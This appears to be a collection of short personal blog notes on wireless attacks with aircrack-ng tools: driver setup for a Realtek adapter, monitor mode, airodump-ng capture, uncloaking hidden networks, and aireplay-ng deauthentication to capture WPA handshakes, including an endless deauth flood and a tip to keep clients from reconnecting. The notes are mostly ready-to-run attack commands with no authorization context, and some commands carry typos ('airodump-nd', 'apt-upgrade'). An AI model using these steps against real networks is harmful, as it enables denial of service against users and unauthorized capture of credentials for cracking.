By rbosaz, 4 March, 2024

First locate device using the follow:



Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 001 Device 002: ID 80ee:0021 VirtualBox USB Tablet
Bus 001 Device 004: ID 0bda:8812 Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac 2T2R DB WLAN Adapter

We'll be dealing with the Realtek device. 

Ensure your system is update to date with the following commands:

sudo apt-get update
sudo apt-upgrade -y
sudo apt dist-upgrade -y

Install the Alpha's drivers:

sudo apt-get install realtek-rtl88xxau-dkms
sudo apt-get install dkms
git clone https://github.com/aircrack-ng/rtl8812au
cd rtl8812au
sudo make install

Note: If you get an error during make you may need to install the linux headers:

sudo apt install linux-headers-amd64

Reboot  and ensure device is installed.

Put the device in monitor mode:

sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up



By rbosaz, 27 October, 2022

First identify the target AP's MAC address, then use the following command:

sudo aireplay-ng -0 0 -a <Target AP's MAC> <WLAN Name>

Note: -0 0 will execute deauth to infinity

Websploit is another tool that can be used, but you'll need to install it first.

Using the terminal execute the app as follows.


Available modules can be seen by executing the following.

show modules



By rbosaz, 25 October, 2022

First put WLAN in monitoring mode.

Using the following command, find an AP where its essid is <length:  0>:

airodump-nd <WLAN Name>

Now gather data from the zero length essid AP using the following command:

airodump-ng -c <AP_0 Channel> --bssid <AP_0 MAC> <WLAN Name>

Where: AP_0 = Zero Length AP.

Open up another terminal and disconnect one of the clients attached to the zero length AP:

aireplay-ng -0 3 -a <AP_0 MAC> -c <Client MAC> <WLAN Name>

Once disconnected notice the essid of the AP_0 display a name.


By rbosaz, 25 October, 2022

First get Target AP's client connections using the commands in this reference:

Capture Data from Target AP

Open a second terminal and disconnect a client from the AP by executing the following command. This will allow one to capture the handshake between the AP and client. Handshake will be in the generated pcap file.

aireplay-ng -0 3 -a <Target AP's bssid> -c <Target AP's Client's essid> <wlan name>

Note: the -0 3 is telling the command to execute three times, you can increase the three to a larger value to keep client from reconnecting.

By rbosaz, 25 October, 2022

Once you find an AP target execute the following command to capture data from the AP:

sudo airodump-ng --channel <Target AP's Channel> --bssid <Target AP's MAC> --write <Output File Name> <Your WLAN Name>

You can quit using ctrl+c or hitting 'q' twice.

The above command will create the following files:

  • <Output File Name>.csv
  • <Output File Name>.pcap: this file will have the handshake information
  • <Output File Name>.kismet.csv
  • <Output File Name>.kismet.netxml
By rbosaz, 25 October, 2022

When sniffing for AP's gather the following AP information before cracking:

  • BSSID: MAC address of the network.
  • CHANNEL: The Channel that the network is running on.
  • ENC: The encryption type.
  • ESSID: The name of the network.

Setup WiFi in monitoring mode:

ifconfig <wlan name> down
sudo airmon-ng start <wlan name>
verify via iwconfig

Capture other AP's, using the following command:

sudo airodump-nd <wlan name>

If you wish to sniff a specific band (a, b or g) add --band parameter after the interface name. Note: b and g use 2.4Ghz and a uses 5Ghz